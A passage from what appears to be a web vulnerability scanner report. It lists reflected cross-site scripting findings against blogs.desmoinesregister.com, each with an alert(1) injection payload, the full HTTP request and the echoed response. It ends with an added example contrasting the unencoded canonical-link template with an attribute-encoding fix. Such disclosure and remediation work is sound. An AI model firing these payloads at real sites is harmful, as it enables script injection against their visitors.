   url:'http://cx.contextweb.com/
...[SNIP]...

1.116. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b42"><script>alert(1)</script>3113957a202 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69483

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202" />
...[SNIP]...

1.117. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32dec"%3balert(1)//9a97554e736 was submitted in the REST URL parameter 6. This input was echoed as 32dec";alert(1)//9a97554e736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec"%3balert(1)//9a97554e736?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69775

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css32dec";alert(1)//9a97554e736","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.118. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b88e4"><script>alert(1)</script>22ba7e59903 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903?ver=1.0.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/css/nggallery.cssb88e4"><script>alert(1)</script>22ba7e59903" />
...[SNIP]...

1.119. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5488"><script>alert(1)</script>683302c7758 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssc5488"><script>alert(1)</script>683302c7758" />
...[SNIP]...

1.120. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe488"%3balert(1)//e8899a6b1a0 was submitted in the REST URL parameter 6. This input was echoed as fe488";alert(1)//e8899a6b1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488"%3balert(1)//e8899a6b1a0?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69819

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
ript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.cssfe488";alert(1)//e8899a6b1a0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.121. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dfeb"><script>alert(1)</script>1d5781cdb1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js3dfeb"><script>alert(1)</script>1d5781cdb1" />
...[SNIP]...

1.122. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dda02"%3balert(1)//835bdff0c58 was submitted in the REST URL parameter 6. This input was echoed as dda02";alert(1)//835bdff0c58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02"%3balert(1)//835bdff0c58?ver=1.3.0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
cript'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsdda02";alert(1)//835bdff0c58","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.123. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51ec4"%3balert(1)//2ac9bdf6711 was submitted in the REST URL parameter 5. This input was echoed as 51ec4";alert(1)//2ac9bdf6711 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.css51ec4"%3balert(1)//2ac9bdf6711?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
uires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css51ec4";alert(1)//2ac9bdf6711","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.124. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/wp-email/email-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e743e"><script>alert(1)</script>045c9ac9fe9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9?ver=2.50 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69466

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e"><script>alert(1)</script>045c9ac9fe9" />
...[SNIP]...

1.125. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4b81"%3balert(1)//ea5f78fe07a was submitted in the REST URL parameter 6. This input was echoed as d4b81";alert(1)//ea5f78fe07a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81"%3balert(1)//ea5f78fe07a HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69717

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
quires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.jsd4b81";alert(1)//ea5f78fe07a","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.126. http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 291b0"><script>alert(1)</script>9616e98d8c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69793

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6" />
...[SNIP]...
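
The two ways the canonical link above can be built, as an added example (not code from the report or from the Des Moines Register site): raw concatenation, which reproduces the captured reflection, beside attribute encoding, which neutralizes it. The template strings, function names and the small tag walker are assumptions made for the illustration; the payload is the one from the capture.

```javascript
// Added example, not code from the scanner report or the affected site.
// Models the <link rel="canonical"> sink from finding 1.126 two ways and
// checks whether the generated fragment lets a <script> tag escape the
// attribute value.

// Vulnerable template: the request path is dropped into a double-quoted
// attribute verbatim (this is what the captured 404 page does).
function canonicalLinkUnsafe(requestPath) {
  return '<link rel="canonical" href="http://blogs.desmoinesregister.com' +
         requestPath + '" />';
}

// Attribute encoder: every character that can end a double-quoted attribute
// value or start markup becomes an entity. '&' goes first so that entities
// already present are not re-encoded incorrectly.
function encodeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened template: same output shape, encoded value.
function canonicalLinkSafe(requestPath) {
  return '<link rel="canonical" href="http://blogs.desmoinesregister.com' +
         encodeHtmlAttr(requestPath) + '" />';
}

// Minimal check of the scanner's claim: does a <script start tag occur as
// markup, i.e. outside any quoted attribute value, in the fragment?
// A tiny state walker is enough for fragments like these; it is not a full
// HTML tokenizer.
function scriptTagOutsideAttributes(html) {
  let inTag = false;
  let quote = null;             // the quote character we are currently inside
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (quote) {                // inside an attribute value: only its closing quote matters
      if (c === quote) quote = null;
      continue;
    }
    if (inTag) {
      if (c === '"' || c === "'") quote = c;
      else if (c === '>') inTag = false;
      continue;
    }
    if (c === '<') {
      if (html.slice(i, i + 7).toLowerCase() === '<script') return true;
      inTag = true;
    }
  }
  return false;
}

// Payload from finding 1.126: canary, quote to close the attribute, '>' to
// close the tag, then the script element, then a second canary.
const PATH_1_126 =
  '/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js291b0"><script>alert(1)</script>9616e98d8c6';

// Stand-alone run: the unsafe fragment breaks out, the encoded one does not.
function demo() {
  return {
    unsafeBreaksOut: scriptTagOutsideAttributes(canonicalLinkUnsafe(PATH_1_126)),
    safeBreaksOut:   scriptTagOutsideAttributes(canonicalLinkSafe(PATH_1_126)),
    safeFragment:    canonicalLinkSafe(PATH_1_126),
  };
}
```

Attribute encoding is the whole fix for this particular sink because the server supplies the scheme and host itself; if the attacker could control the start of the href value, the scheme would also have to be validated.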

1.127. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f8e"><script>alert(1)</script>917b1fb18f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

Same sink as 1.126 (the 404 error page's canonical link), reached through a different path.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2" />
...[SNIP]...

1.128. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36671"%3balert(1)//1caaebcb5b0 was submitted in the REST URL parameter 5. This input was echoed as 36671";alert(1)//1caaebcb5b0 in the application's response (the server URL-decodes %3b to a semicolon before writing it out).

Sink: the "Url" member of the response object assigned to GEL.thepage.pageinfo.semantics on the same 404 error page. The double quote terminates the string literal and // comments out the remainder of that line. Caveat on the proof of concept as shown: the commented-out remainder includes the closing brace of the inner object and the comma after it, and a semicolon is not valid between members of an object literal, so the script block as captured is a syntax error and alert(1) would not run in a browser. The echo itself is unencoded, which is what the finding records; a working proof of concept would have to leave the enclosing object literals syntactically valid. Verify execution in a browser before rating practical impact.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/login.html36671"%3balert(1)//1caaebcb5b0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
